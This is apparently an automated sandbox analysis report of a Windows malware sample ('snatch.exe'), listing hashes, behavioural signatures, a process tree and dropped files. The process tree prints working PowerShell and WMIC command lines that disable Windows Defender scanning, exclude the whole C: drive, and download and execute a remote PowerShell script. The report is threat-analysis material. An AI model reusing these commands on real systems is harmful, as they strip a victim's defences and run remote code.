Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 11:59

General

  • Target

    2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

  • Size

    50.9MB

  • MD5

    5bfa176d4d484262d8762d97bcd2b784

  • SHA1

    7f09db1fa2d3f0d4f73621516eabd95f9175de96

  • SHA256

    54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

  • SHA512

    93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675

  • SSDEEP

    1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2612
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 71A874F1A3A05924F5C0B10E1827D917 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:688

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

    Filesize

    36.6MB

    MD5

    6d9b5a3b75da266db5c237b0ac70b7f9

    SHA1

    9ce4aa208974b299ce0abeaf043740616f4f0b02

    SHA256

    d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b

    SHA512

    fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

  • C:\Users\Admin\AppData\Local\Temp\MSI9B17.tmp

    Filesize

    298KB

    MD5

    684f2d21637cb5835172edad55b6a8d9

    SHA1

    5eac3b8d0733aa11543248b769d7c30d2c53fcdb

    SHA256

    da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

    SHA512

    7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • C:\Users\Admin\AppData\Local\Temp\install.exe

    Filesize

    36.6MB

    MD5

    979ce82b2ea35a92fae6a60c6c3e3791

    SHA1

    8d260eea0151ee7a6aae88eb2e9015d5efb2603b

    SHA256

    be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca

    SHA512

    ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    68ef68415ba57219816065c9af471b99

    SHA1

    0d027a4abb658610f507c6562b288b04f6b37151

    SHA256

    9e8d3a55a68c3296389311d8b7d07527b00362655b852ddd05994c75a9e33950

    SHA512

    baf717e9759ffd35d6c0d153bde17ab8ea4138d5c3ac6bbb1fc5a2c155e678f748459ebeddfeeb5adb4236711b54d422cfe71cd45a23a547f35eabe86d3cd219

  • memory/2412-7-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

  • memory/2412-6-0x0000000002B40000-0x0000000002BC0000-memory.dmp

    Filesize

    512KB

  • memory/2412-20-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-21-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-8-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

  • memory/2412-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2972-5-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB

  • memory/2972-36-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB

  • memory/2972-38-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB